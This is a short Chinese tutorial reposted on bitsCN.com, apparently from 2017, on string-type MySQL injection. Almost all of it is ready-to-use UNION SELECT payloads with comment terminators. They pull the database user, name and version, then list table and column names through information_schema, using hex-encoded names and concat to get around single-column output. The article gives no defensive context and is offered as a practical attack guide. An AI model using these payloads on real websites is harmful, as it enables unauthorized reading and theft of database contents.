作者:mobiledu2502870133 | 来源:互联网 | 2017-05-12 16:10
bitsCN.com
MYSQL注入语句实用精解
只讲字符型。
order by XX
Union select .....
1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。
1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version()) #
上面是字符型的,注释符为 # , CONCAT_WS 为用分隔符隔开连接的字符。
获取数据库等的信息
1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database() #
concat产生只是字符串连接,不用也可以,也应该可以把所有表输出。table_name 和 table_schema 是 information_schema中tables表中的一个字段。
1' UNION SELECT 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #
0x7573657273这个是users的十六进制表示形式。这个users只是一个特例而已。主要根据上面获得表中字段值进行查询。到了这里,数据库知道了,表知道了,表的字段也知道了。剩下的还不会查吗。直接union 查。
库information_schema 中的表tables 有 table_schema(数据库名) 和 table_name(表名) 两个主要字段
库information_schema 中的表columns 有 table_name(表名) 和 column_name(列名) 两主要字段
就算是 order by 出来只有一个可以显示也没关系。可以用concat
如: concat(字段,0x3a,字段) 把两个字段显示出来了。中间那个是 : 的十六进制表示形式。
bitsCN.com